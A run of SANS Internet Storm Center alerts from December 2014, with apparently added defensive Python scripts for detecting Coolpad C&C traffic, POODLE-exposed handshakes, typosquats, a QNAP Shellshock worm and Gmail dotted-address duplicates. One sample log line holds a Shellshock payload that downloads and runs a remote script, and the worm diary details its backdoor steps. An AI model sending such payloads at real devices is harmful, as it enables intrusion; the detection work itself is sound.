Latest Alerts

SANS Internet Storm Center, InfoCON: green

Certified pre-pw0ned Android Smartphones: Coolpad Firmware Backdoor, (Wed, Dec 17th)

Wed, 12/17/2014 - 06:44

Researchers at Palo Alto found that many ROM images used for Android smart phones manufactured by Coolpad contain a backdoor, giving an attacker full control of the device. Palo Alto named the backdoor Coolreaper.

With Android, it is very common for manufacturers to install additional applications. But those applications sit on top of the Android operating system. In this case, Coolpad integrated additional functionality into the firmware of the device itself. Coolpad then used this backdoor to push advertisements to its users and to install additional Android applications. But its functionality goes well beyond pushing advertisements.

The backdoor provides full access to the device: it allows the installation of additional software, access to any information about the device, and even notifying the user of fake over-the-air updates.

How important is this threat?

Coolpad devices are mostly used in China, with a market share of 11.5% according to the report. They are not found much outside of China. The phones are typically sold under brands like Coolpad, Dazen and Magview.

The following domains and IPs are used for the command and control (C&C) channel:

113.142.37.149, dmp.coolyn.com, dmp.51coolpad.com, icudata.coolyun.com, icudata.51coolpad.com, 113.142.37.246, icucfg.coolyun.com and others. Blocking and logging outbound traffic to these IPs and domains will help you identify affected devices.
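The blocking-and-logging advice above is easy to turn into a detection pass over existing proxy or DNS logs. The script below is an added example and not code from the ISC diary or the Palo Alto report; it takes the indicators quoted in the diary, matches destination IPs exactly and hostnames by suffix (so a host beneath icucfg.coolyun.com still counts), and reports which internal clients talked to them. The log layout and the sample lines are constructed for illustration.

```python
"""Match outbound proxy/DNS log lines against the CoolReaper C&C indicators.

Added example, not code from the ISC diary or the Palo Alto report. The
indicator list is the one quoted in the diary; the log format and the sample
lines are constructed for illustration.
"""
import ipaddress
import re
from collections import defaultdict

# Indicators quoted in the diary (the report lists more: "and others").
COOLREAPER_IPS = {"113.142.37.149", "113.142.37.246"}
COOLREAPER_DOMAINS = {
    "dmp.coolyn.com",
    "dmp.51coolpad.com",
    "icudata.coolyun.com",
    "icudata.51coolpad.com",
    "icucfg.coolyun.com",
}

# Assumed (hypothetical) log layout: "<timestamp> <client-ip> <dst-host>[:port] <rest>"
LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+([^\s:]+)(?::\d+)?(?:\s+(.*))?$")


def matches_indicator(dst):
    """Return the indicator matched by a destination host or IP, else None.

    IP literals must match exactly; hostnames match when they equal a listed
    domain or sit anywhere beneath it (cdn.icucfg.coolyun.com still counts).
    """
    dst = dst.lower().rstrip(".")
    try:
        ipaddress.ip_address(dst)
    except ValueError:
        pass  # not an IP literal: fall through to the domain check
    else:
        return dst if dst in COOLREAPER_IPS else None
    for domain in COOLREAPER_DOMAINS:
        if dst == domain or dst.endswith("." + domain):
            return domain
    return None


def find_affected_clients(log_lines):
    """Map each internal client IP to the set of C&C indicators it contacted."""
    hits = defaultdict(set)
    for line in log_lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # unparseable line; a real pipeline would count these
        _ts, client, dst, _rest = m.groups()
        indicator = matches_indicator(dst)
        if indicator:
            hits[client].add(indicator)
    return dict(hits)


# Constructed sample log: two clients reach C&C hosts, one is clean, and one
# talks to a neighbouring IP that is NOT on the list (worth a manual look given
# the "and others", but not flagged automatically).
SAMPLE_LOG = """\
2014-12-17T06:40:01Z 10.0.5.23 icudata.coolyun.com:443 CONNECT
2014-12-17T06:40:02Z 10.0.5.23 113.142.37.149:80 GET /dmp/cfg
2014-12-17T06:40:05Z 10.0.7.9 www.example.org:80 GET /
2014-12-17T06:40:09Z 10.0.7.9 cdn.icucfg.coolyun.com:80 GET /update
2014-12-17T06:41:00Z 10.0.9.1 113.142.37.200:80 GET /
"""

if __name__ == "__main__":
    for client, indicators in sorted(find_affected_clients(SAMPLE_LOG.splitlines()).items()):
        print(f"{client}: {', '.join(sorted(indicators))}")
```

Suffix matching is deliberate: a firmware component is free to pick any hostname under a domain it controls, so an exact-hostname blocklist would miss the next subdomain. The neighbouring address 113.142.37.200 is intentionally left unflagged; widening to the whole /24 is a judgement call for the analyst, not something the script should do silently.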

For details, see the Palo Alto Networks report at https://www.paloaltonetworks.com/threat-research.html

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Wednesday, December 17th 2014 http://isc.sans.edu/podcastdetail.html?id=4279, (Wed, Dec 17th)

Tue, 12/16/2014 - 19:29
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts


Some Memory Forensic with Forensic Suite (Volatility plugins), (Tue, Dec 16th)

Tue, 12/16/2014 - 10:17

In previous diaries we have talked about memory forensics and how important it is.

In this diary I will talk about a new set of Volatility plugins called Forensic Suite, written by Dave Lasalle.

The suite has 14 plugins covering different areas of memory forensics.

The Forensic Suite can be obtained from: http://downloads.volatilityfoundation.org/contest/2014/DaveLasalle_ForensicSuite.zip

In this diary I will talk about some of the plugins.

Firefox history:

To test this plugin, I first browsed the Internet using Firefox, then closed it, to see how much data the firefoxhistory plugin could obtain from the memory image that I acquired after closing Firefox.

The firefoxhistory plugin parses places.sqlite records out of memory and shows the output on screen or, with the --output=csv option, writes it to a CSV file. With CSV output you can work with the data in spreadsheet software such as MS Excel:

vol.py --plugins=plugins/ --profile=Win7SP1x86 --output=csv -f sampleimage.raw firefoxhistory

The firefoxcookies plugin does the same for cookies.sqlite:

vol.py --plugins=plugins/ --profile=Win7SP1x86 --output=csv -f sampleimage.raw firefoxcookies

The idxparser plugin scans memory for Java IDX cache files and prints the metadata and download-history sections of each one it finds:

vol.py --plugins=plugins/ --profile=Win7SP1x86 -f sampleimage.raw idxparser

Volatility Foundation Volatility Framework 2.4

Scanning for IDX files, this can take a while.............

--------------------------------------------------------------------------------

[*] Section 1 (Metadata) found:

Content length: 1624

Last modified date: Tue, 01 Feb 2005 18:28:24 GMT (epoch: 1107282504)

Section 2 length: 270

[*] Section 2 (Download History) found:

URL: http://java.com/jsp_utils/jreCheck.class

IP: 137.254.16.66

: HTTP/1.1 200 OK

content-length: 1624

last-modified: Tue, 01 Feb 2005 18:28:24 GMT

content-type: application/java-vm

date: Mon, 13 Feb 2012 04:21:28 GMT

server: Sun-Java-System-Web-Server/7.0

--------------------------------------------------------------------------------

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Tuesday, December 16th 2014 http://isc.sans.edu/podcastdetail.html?id=4277, (Tue, Dec 16th)

Mon, 12/15/2014 - 16:34
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Safari 8.0.2 Still Supporting SSLv3 with Block Ciphers, (Mon, Dec 15th)

Mon, 12/15/2014 - 14:30

In October, Apple released Security Update 2014-005, specifically with the intent to address the POODLE issue [1]. The description with the update stated:

There are known attacks on the confidentiality of SSL 3.0 when a cipher suite uses a block cipher in CBC mode. An attacker could force the use of SSL 3.0, even when the server would support a better TLS version, by blocking TLS 1.0 and higher connection attempts. This issue was addressed by disabling CBC cipher suites when TLS connection attempts fail.

However, even with the most recent version of Safari, I am still not able to prove this statement true. Instead, I am able to connect to a test server that ONLY supports SSLv3 and block ciphers. [2] Multiple users of the site confirmed this observation, and the logs also confirm that current versions of Safari will happily ignore Apple's advisory. Client Hello sent by Safari (note the record-layer version of TLS 1.0 and the handshake version of TLS 1.2):

SSL Record Layer: Handshake Protocol: Client Hello
    Content Type: Handshake (22)
    Version: TLS 1.0 (0x0301)
    Length: 183
    Handshake Protocol: Client Hello
        Handshake Type: Client Hello (1)
        Length: 179
        Version: TLS 1.2 (0x0303)

Server Hello returned by the test server:

Handshake Protocol: Server Hello
    Handshake Type: Server Hello (2)
    Length: 90
    Version: SSL 3.0 (0x0300)
    ...
    Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA (0x0039)

The server answers with SSL 3.0 and AES in CBC mode, a block cipher suite, and Safari accepts it.
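The two conditions that make a negotiation POODLE-exposed are visible in the capture above: a Server Hello choosing SSL 3.0, and a CBC-mode block cipher suite. The following added example (not part of the ISC diary) parses Client Hello and Server Hello records from raw bytes, reports the versions and cipher suite, and flags the exposure. It also reports whether the client offered the TLS_FALLBACK_SCSV signalling suite (0x5600, RFC 7507), which is the standard form of the "downgrade protection" the diary speculates about; a server that understands it refuses a fallback handshake at a lower version than it supports. The byte strings are constructed to mirror the capture; the cipher-suite table is a small subset of the IANA registry.

```python
"""Parse TLS/SSL Hello records and flag a POODLE-exposed negotiation.

Added example, not part of the ISC diary. The records are constructed here to
mirror the capture above (ClientHello at record version TLS 1.0 announcing
TLS 1.2; ServerHello answering SSL 3.0 with a CBC suite). The cipher-suite
table is a small subset of the IANA registry.
"""
import struct

VERSION_NAMES = {0x0300: "SSL 3.0", 0x0301: "TLS 1.0", 0x0302: "TLS 1.1", 0x0303: "TLS 1.2"}
SUITE_NAMES = {
    0x0004: "TLS_RSA_WITH_RC4_128_MD5",
    0x0005: "TLS_RSA_WITH_RC4_128_SHA",
    0x000A: "TLS_RSA_WITH_3DES_EDE_CBC_SHA",
    0x002F: "TLS_RSA_WITH_AES_128_CBC_SHA",
    0x0035: "TLS_RSA_WITH_AES_256_CBC_SHA",
    0x0039: "TLS_DHE_RSA_WITH_AES_256_CBC_SHA",
    0x5600: "TLS_FALLBACK_SCSV",  # RFC 7507 downgrade-protection signal
}
HANDSHAKE, CLIENT_HELLO, SERVER_HELLO = 22, 1, 2
FALLBACK_SCSV = 0x5600


def parse_hello(record):
    """Parse one handshake record holding a ClientHello or ServerHello."""
    ctype, rec_version, rec_len = struct.unpack("!BHH", record[:5])
    if ctype != HANDSHAKE:
        raise ValueError("not a handshake record")
    body = record[5:5 + rec_len]
    hs_type, hs_len = body[0], int.from_bytes(body[1:4], "big")
    hs = body[4:4 + hs_len]
    version = struct.unpack("!H", hs[:2])[0]
    pos = 2 + 32                      # skip the 32-byte random
    pos += 1 + hs[pos]                # skip the length-prefixed session_id
    info = {"record_version": rec_version, "type": hs_type, "version": version}
    if hs_type == CLIENT_HELLO:       # client sends a vector of suites
        n = struct.unpack("!H", hs[pos:pos + 2])[0]
        pos += 2
        info["cipher_suites"] = [struct.unpack("!H", hs[i:i + 2])[0] for i in range(pos, pos + n, 2)]
    elif hs_type == SERVER_HELLO:     # server answers with exactly one
        info["cipher_suite"] = struct.unpack("!H", hs[pos:pos + 2])[0]
    else:
        raise ValueError("not a Hello message")
    return info


def assess(client_hello, server_hello):
    """Summarise the negotiated parameters and whether POODLE applies."""
    ch, sh = parse_hello(client_hello), parse_hello(server_hello)
    suite = SUITE_NAMES.get(sh["cipher_suite"], f"0x{sh['cipher_suite']:04x}")
    return {
        "client_version": VERSION_NAMES.get(ch["version"], hex(ch["version"])),
        "server_version": VERSION_NAMES.get(sh["version"], hex(sh["version"])),
        "cipher_suite": suite,
        "fallback_scsv_offered": FALLBACK_SCSV in ch["cipher_suites"],
        # POODLE needs SSL 3.0 *and* a CBC-mode block cipher. RC4 is not affected
        # by POODLE but has its own problems, so "not exposed" is not "safe".
        "poodle_exposed": sh["version"] == 0x0300 and "_CBC_" in suite,
    }


def build_client_hello(version, suites, random=b"\x11" * 32):
    """Minimal ClientHello; the record layer says TLS 1.0, as in the capture."""
    body = struct.pack("!H", version) + random + b"\x00"   # version, random, empty session id
    body += struct.pack("!H", 2 * len(suites)) + b"".join(struct.pack("!H", s) for s in suites)
    body += b"\x01\x00"                                     # one compression method: null
    hs = bytes([CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body
    return bytes([HANDSHAKE]) + struct.pack("!HH", 0x0301, len(hs)) + hs


def build_server_hello(version, suite, random=b"\x22" * 32):
    """Minimal ServerHello choosing one suite and null compression."""
    body = struct.pack("!H", version) + random + b"\x00" + struct.pack("!H", suite) + b"\x00"
    hs = bytes([SERVER_HELLO]) + len(body).to_bytes(3, "big") + body
    return bytes([HANDSHAKE]) + struct.pack("!HH", version, len(hs)) + hs


def diary_exchange():
    """The exchange from the diary: TLS 1.2 offered, SSL 3.0 + AES-CBC chosen."""
    return build_client_hello(0x0303, [0x0039, 0x002F, 0x0005]), build_server_hello(0x0300, 0x0039)


if __name__ == "__main__":
    print(assess(*diary_exchange()))
```

Run against a real capture, feed `assess` the first handshake record from each direction (the five-byte record header is where the parser starts). Note that the SCSV only helps when the server implements it; the diary's test server speaks nothing but SSLv3, so the only client-side defence there is refusing SSL 3.0 outright, which is what the Apple advisory claims Safari does for CBC suites.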

Another issue we discovered with the poodletest.com website is the use of proxies. Some proxies still support SSLv3, and if they are configured as a trusted proxy terminating SSL connections, they may downgrade a connection to SSLv3 regardless of what the browser would do.

How serious is it? The POODLE attack is still a low probability attack. I am not aware of any active use of the attack. So no need to panic. But vendors like Apple aren't helping with incomplete statements. It is possible that Safari is doing some form of downgrade protection. But this is not explained in the very brief advisory.

[1]https://support.apple.com/en-us/HT203107
[2]https://sslv3.dshield.org/vulnpoodle.png

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Customized Support Scam Supported by Typo Squatting, (Mon, Dec 15th)

Mon, 12/15/2014 - 13:11

This attack has it all, and shows how hard it can be for someone who does not read the ISC to evade some of these tech support scams. The URL used, http://login.microsoftlonine.com, differs from the legitimate Microsoft Office 365 login page, login.microsoftonline.com, by a single misplaced letter (did you notice it?).

The content you will get back varies. But here is a screenshot submitted by our reader Daniel:

The user was redirected to warning.netsecurityalerts.com (the site appears down right now), and to bolster the site's credibility, it displays the user's correct ISP (we all know this is an easy whois lookup, but a user confronted with this message is much more likely to fall for it than for a generic message).

Calling the 800 number now will lead to a sales system trying to sell you a medical alert button if you are 50 years or older.
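A name that is one misplaced letter away from a login domain is exactly what a proxy log review should catch. The following is an added example, not from the ISC diary: it reduces each hostname to its registrable domain and computes an optimal-string-alignment edit distance (insert, delete, substitute, adjacent swap) to a list of protected domains. The protected list and all sample hostnames except login.microsoftlonine.com are constructed. Note that the diary's domain moves one letter rather than adding one, which is two single-character edits, so the threshold is 2.

```python
"""Spot hostnames one or two edits away from a protected login domain.

Added example, not from the ISC diary. The protected-domain list and the
sample hostnames are constructed; only login.microsoftlonine.com comes from
the diary. Distance is optimal string alignment (insert, delete, substitute,
adjacent swap), the same operations most typosquat generators use.
"""

# Domains whose look-alikes we care about (constructed list; extend with your own).
PROTECTED = {"microsoftonline.com", "office.com", "live.com"}


def registrable(host):
    """Reduce a hostname to its last two labels.

    Simplification: ignores multi-label public suffixes such as co.uk; use
    the Public Suffix List for production.
    """
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])


def edit_distance(a, b):
    """Optimal string alignment distance between a and b."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,          # deletion
                          d[i][j - 1] + 1,          # insertion
                          d[i - 1][j - 1] + cost)   # substitution / match
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)   # adjacent transposition
    return d[len(a)][len(b)]


def typosquat_candidates(hosts, protected=PROTECTED, max_distance=2):
    """Return (host, closest protected domain, distance) for look-alikes.

    Exact matches are the real thing and are skipped. max_distance=2 covers
    the diary's case: "lon" vs "onl" is a moved letter, i.e. two edits.
    """
    findings = []
    for host in hosts:
        name = registrable(host)
        if name in protected:
            continue
        closest, dist = min(((p, edit_distance(name, p)) for p in protected), key=lambda t: t[1])
        if dist <= max_distance:
            findings.append((host, closest, dist))
    return findings


# Constructed proxy-log hostnames; the second one is the domain from the diary.
SAMPLE_HOSTS = [
    "login.microsoftonline.com",
    "login.microsoftlonine.com",
    "www.micros0ftonline.com",
    "cdn.example.com",
    "warning.netsecurityalerts.com",
]

if __name__ == "__main__":
    for host, target, dist in typosquat_candidates(SAMPLE_HOSTS):
        print(f"{host}: {dist} edit(s) from {target}")
```

Edit distance on the registrable name, not the full hostname, is what keeps "login." prefixes from masking the squat. A threshold of 2 is workable for names as long as microsoftonline.com; for short protected domains it will produce false positives, so tune per entry or add a homoglyph table rather than raising the distance further.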

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts


ISC StormCast for Monday, December 15th 2014 http://isc.sans.edu/podcastdetail.html?id=4275, (Mon, Dec 15th)

Sun, 12/14/2014 - 16:40
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Worm Backdoors and Secures QNAP Network Storage Devices, (Sun, Dec 14th)

Sun, 12/14/2014 - 10:21

Shellshock is far from over, with many devices still not patched and out there ready for exploitation. One set of devices receiving a lot of attention recently are QNAP disk storage systems. QNAP released a patch in early October, but applying the patch is not automatic and far from trivial for many users [1]. Our reader Erich submitted a link to an interesting Pastebin post with code commonly used in these scans [2].

The attack targets a QNAP CGI script, /cgi-bin/authLogin.cgi, a well known vector for Shellshock on QNAP devices [3]. This script is called during login, and reachable without authentication. The exploit is then used to launch a simple shell script that will download and execute a number of additional pieces of malware:

emme [SHA1: 611bd8bea11d6edb68ed96583969f85469f87e0f]:

This appears to implement a click fraud script against the advertisement network JuiceADV. The user ID used is 4287, and http://www.123linux.it is used as the referrer. The user agent is altered based on a remote feed.

cl [SHA1: b61fa82063975ba0dcbbdae2d4d9e8d648ca1605]:

A one-liner shell script uploading part of /var/etc/CCcam.cfg to ppoolloo.altervista.com. My test QNAP system does not have this file, so I am not sure what they are after.

The script also creates a hidden directory, /share/MD0_DATA/optware/.xpl, which is then used to stash some of the downloaded scripts and files.

A couple of other changes made by the script:

  • Sets the DNS server to 8.8.8.8
  • Creates an SSH server on port 26
  • Adds an admin user called request
  • Downloads and copies a script to cgi-bin: armgH.cgi and exo.cgi
  • Modifies autorun.sh to run the backdoors on reboot

Finally, the script will also download and install the Shellshock patch from QNAP and reboot the device.

Infected devices have been observed scanning for other vulnerable devices. I was not able to recover all of the scripts that the code on Pastebin downloads. The scanner may be contained in one of the additional scripts.
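The diary gives enough artefacts to check a NAS for this worm from both sides: the exploit attempt in the web server's access log (a Shellshock payload starts a header value with "() {" and here targets /cgi-bin/authLogin.cgi), and the changes it leaves behind on the device. The script below is an added example, not from the ISC diary or the Pastebin script it describes. The artefact names come from the diary; the cgi-bin location (/home/httpd/cgi-bin) and the autorun.sh path are assumptions about QNAP's filesystem layout, and the log lines, passwd entries and /proc/net/tcp excerpt are constructed sample data.

```python
"""Look for the QNAP Shellshock worm in web logs and on the device itself.

Added example, not from the ISC diary or the Pastebin script. Artefacts (.xpl
stash directory, armgH.cgi/exo.cgi, user "request", sshd on tcp/26, resolver
8.8.8.8) are the ones listed in the diary; CGI_DIR and AUTORUN_PATH are
assumptions about QNAP's layout. All sample data below is constructed.
"""
import os
import re

CGI_DIR = "/home/httpd/cgi-bin"            # assumed QNAP web root
AUTORUN_PATH = "/tmp/config/autorun.sh"    # assumed location once the config flash is mounted
STASH_DIR = "/share/MD0_DATA/optware/.xpl"
BACKDOOR_CGIS = ("armgH.cgi", "exo.cgi")
BACKDOOR_USER = "request"
BACKDOOR_SSH_PORT = 26

SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")   # "() {" opens every Shellshock payload
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*"')   # combined log format


def find_shellshock_attempts(log_lines):
    """Return (source IP, path, targets_authLogin) for each Shellshock-shaped request."""
    attempts = []
    for line in log_lines:
        m = ACCESS_RE.match(line)
        if m and SHELLSHOCK_RE.search(line):
            src, path = m.groups()
            attempts.append((src, path, path.endswith("/cgi-bin/authLogin.cgi")))
    return attempts


def listening_ports(proc_net_tcp):
    """Listening TCP ports from /proc/net/tcp text (st column 0A = LISTEN, port in hex)."""
    ports = set()
    for line in proc_net_tcp.splitlines()[1:]:      # first line is the header
        fields = line.split()
        if len(fields) > 3 and fields[3] == "0A":
            ports.add(int(fields[1].split(":")[1], 16))
    return ports


def evaluate(existing_paths, passwd_text, autorun_text, ports, resolv_text):
    """Turn collected host facts into findings; an empty list means nothing matched."""
    findings = []
    if STASH_DIR in existing_paths:
        findings.append(f"stash directory present: {STASH_DIR}")
    for name in BACKDOOR_CGIS:
        if f"{CGI_DIR}/{name}" in existing_paths:
            findings.append(f"backdoor CGI present: {CGI_DIR}/{name}")
    for entry in passwd_text.splitlines():
        fields = entry.split(":")
        if len(fields) > 2 and fields[0] == BACKDOOR_USER:
            findings.append(f"user '{BACKDOOR_USER}' exists (uid {fields[2]})")
    if any(marker in autorun_text for marker in (STASH_DIR,) + BACKDOOR_CGIS):
        findings.append("autorun.sh references the backdoor files")
    if BACKDOOR_SSH_PORT in ports:
        findings.append(f"tcp/{BACKDOOR_SSH_PORT} is listening (second sshd)")
    if "8.8.8.8" in resolv_text:
        findings.append("resolver is 8.8.8.8 (weak indicator on its own)")
    return findings


def check_local_device():
    """Collect the same facts from a live NAS (run as admin) and evaluate them."""
    def read(path):
        try:
            with open(path) as fh:
                return fh.read()
        except OSError:
            return ""
    candidates = [STASH_DIR] + [f"{CGI_DIR}/{n}" for n in BACKDOOR_CGIS]
    existing = {p for p in candidates if os.path.exists(p)}
    return evaluate(existing, read("/etc/passwd"), read(AUTORUN_PATH),
                    listening_ports(read("/proc/net/tcp")), read("/etc/resolv.conf"))


# Constructed samples (TEST-NET addresses): one exploit hit on authLogin.cgi,
# one normal login, one Shellshock probe against another script.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [14/Dec/2014:09:12:01 +0000] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 200 512 "-" '
    '"() { :; }; wget http://203.0.113.9/x.sh -O /tmp/x.sh; sh /tmp/x.sh"',
    '192.0.2.10 - - [14/Dec/2014:09:13:22 +0000] "GET /cgi-bin/authLogin.cgi HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [14/Dec/2014:09:14:40 +0000] "GET /cgi-bin/other.cgi HTTP/1.1" 404 0 "-" "() { :; }; echo probe"',
]
SAMPLE_PASSWD = "admin:x:0:0:administrator:/root:/bin/sh\nrequest:x:0:0::/root:/bin/sh\n"
SAMPLE_AUTORUN = "#!/bin/sh\ncp /share/MD0_DATA/optware/.xpl/exo.cgi /home/httpd/cgi-bin/\n"
SAMPLE_PROC_NET_TCP = (
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
    "   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1234 1\n"
    "   1: 00000000:001A 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 1235 1\n"
    "   2: 0100007F:0050 0100007F:C3A0 01 00000000:00000000 00:00000000 00000000     0        0 1236 1\n"
)
SAMPLE_EXISTING = {STASH_DIR, f"{CGI_DIR}/armgH.cgi"}

if __name__ == "__main__":
    print(find_shellshock_attempts(SAMPLE_ACCESS_LOG))
    print(evaluate(SAMPLE_EXISTING, SAMPLE_PASSWD, SAMPLE_AUTORUN,
                   listening_ports(SAMPLE_PROC_NET_TCP), "nameserver 8.8.8.8\n"))
```

Collection and evaluation are split on purpose: `evaluate` is pure, so it can be unit-tested and run against facts gathered by any means (a mounted disk image, a support bundle), while `check_local_device` is the thin live-host wrapper. Remember the worm's last step is to install QNAP's own Shellshock patch, so "the device is patched" is not evidence that it was never compromised; look for the artefacts regardless.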

[1] http://www.qnap.com/i/en/news/con_show.php?op=showone&cid=342
[2] http://pastebin.com/AQJgM5ij
[3] https://www.fireeye.com/blog/threat-research/2014/10/the-shellshock-aftershock-for-nas-administrators.html

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts


ISC StormCast for Friday, December 12th 2014 http://isc.sans.edu/podcastdetail.html?id=4273, (Fri, Dec 12th)

Thu, 12/11/2014 - 19:09
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

GMail quirk used to subvert website spam tracking, (Wed, Dec 10th)

Thu, 12/11/2014 - 06:31

Yesterday while reviewing our logs here at the SANS Internet Storm Center I stumbled upon these:

login failed for s.ervic.d.157.6@gmail.com
login failed for se.rv.icd.15.76@gmail.com
login failed for r.a.mo.s.odalys.33.3@gmail.com
login failed for sho.ppin.g48service@gmail.com

The reason this caught my eye is because I recall reading that GMail ignores periods in email addresses. For example, if I register alexs12345@gmail.com but then begin sending email to a.l.e.x.s.1.2.3.4.5@gmail.com, it will arrive in my inbox despite the additional periods.

Many blog and forum platforms have functionality for banning by email address. Spammers can use the periods in GMail addresses to subvert such banning controls by registering again without having to produce a truly new email address. Do your systems and/or websites allow for registering multiple accounts this way?

Where this becomes more interesting is that these logs indicate visitors that tried to log in using these email addresses without having even attempted to register them first. None of the above logs come from a single IP address, though the first two do come from a single IP range. Is this due to a poorly programmed bot, or is it indicative of something else?
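The question above ("do your systems allow registering multiple accounts this way?") has a simple technical answer: canonicalise the address before checking uniqueness. The function below is an added example, not from the ISC diary. For gmail.com and googlemail.com (which deliver to the same mailbox) it lower-cases the local part, drops the dots and strips any "+tag" suffix, then compares. Run over the four addresses from the log excerpt, it also shows something the diary does not spell out: the first two entries, s.ervic.d.157.6 and se.rv.icd.15.76, are the same Gmail account, which fits the observation that they came from one IP range.

```python
"""Canonicalise Gmail addresses so dotted and plus-tagged variants collide.

Added example, not from the ISC diary. Gmail ignores dots in the local part,
treats everything after "+" as a tag, and delivers googlemail.com to the same
mailbox; other domains are left alone apart from lower-casing the domain.
The four addresses in DIARY_LOG_ADDRESSES are the ones from the diary.
"""
from collections import defaultdict

GMAIL_DOMAINS = {"gmail.com", "googlemail.com"}


def canonical_email(address):
    """Return the form of an address that Gmail actually delivers to."""
    local, _, domain = address.strip().rpartition("@")
    domain = domain.lower().rstrip(".")
    if domain in GMAIL_DOMAINS:
        local = local.lower().split("+", 1)[0].replace(".", "")
        domain = "gmail.com"
    return f"{local}@{domain}"


def duplicate_registrations(addresses):
    """Group addresses by canonical form; return only groups with more than one entry."""
    groups = defaultdict(list)
    for addr in addresses:
        groups[canonical_email(addr)].append(addr)
    return {canon: addrs for canon, addrs in groups.items() if len(addrs) > 1}


def is_already_registered(existing_addresses, candidate):
    """True if a signup would collide with an existing account after canonicalisation."""
    known = {canonical_email(a) for a in existing_addresses}
    return canonical_email(candidate) in known


# The four addresses from the failed-login excerpt in the diary.
DIARY_LOG_ADDRESSES = [
    "s.ervic.d.157.6@gmail.com",
    "se.rv.icd.15.76@gmail.com",
    "r.a.mo.s.odalys.33.3@gmail.com",
    "sho.ppin.g48service@gmail.com",
]

if __name__ == "__main__":
    for canon, variants in duplicate_registrations(DIARY_LOG_ADDRESSES).items():
        print(canon, "<-", ", ".join(variants))
```

Store the original address for mail delivery but index uniqueness (and ban lists) on the canonical form. The non-Gmail branch deliberately keeps the local part untouched: RFC 5321 allows local parts to be case-sensitive, and dots are significant at most other providers, so the normalisation is provider-specific by design.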

Let us know what you think in the comments!

--
Alex Stanford - GIAC GWEB GSEC,
Research Operations Manager,
SANS Internet Storm Center
/in/alexstanford

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

ISC StormCast for Thursday, December 11th 2014 http://isc.sans.edu/podcastdetail.html?id=4271, (Thu, Dec 11th)

Wed, 12/10/2014 - 17:59
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Odd new ssh scanning, possibly for D-Link devices, (Wed, Dec 10th)

Wed, 12/10/2014 - 11:49

I noticed it in my own logs overnight and also had a couple of readers (both named Peter) report some odd new ssh scanning overnight. The scanning involves many sites, likely a botnet, attempting to ssh in as 3 users: D-Link, admin, and ftpuser. Given the first of those usernames, I suspect that they are targeting improperly configured D-Link routers or other appliances that have some sort of default password. The system that I have at home was not running kippo, so I didn't get the passwords that they were guessing and was not able to see what they might do if they succeed in ssh-ing in. If anyone out there has any more info on what exactly they are targeting, please let us know by e-mail, via the contact page, or by commenting on this post. I'll try to reconfigure a couple of kippo honeypots to see if I can capture the bad guys there and may update this post later.

---------------
Jim Clausing, GIAC GSE #26
jclausing --at-- isc [dot] sans (dot) edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Two VMWare Security Updates for vCloud Automation Center and Airwatch, (Wed, Dec 10th)

Wed, 12/10/2014 - 11:04

We got two security updates from VMware this week:

VMSA-2014-0013 | CVE-2014-8373 | VMware vCloud Automation Center | Remote privilege escalation vulnerability. Authenticated remote users may obtain administrative privileges. Mitigated by turning off "Connect (by) Using VMRC".
VMSA-2014-0014 | CVE-2014-8372 | AirWatch | A direct object reference vulnerability allows users to see each other's information.

VMSA-2014-0013: http://www.vmware.com/security/advisories/VMSA-2014-0013.html

---
Johannes B. Ullrich, Ph.D.
STI|Twitter|LinkedIn

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
Categories: Alerts

Malware Signed With Valid SONY Certificate (Update: This was a Joke!), (Wed, Dec 10th)

Wed, 12/10/2014 - 08:06

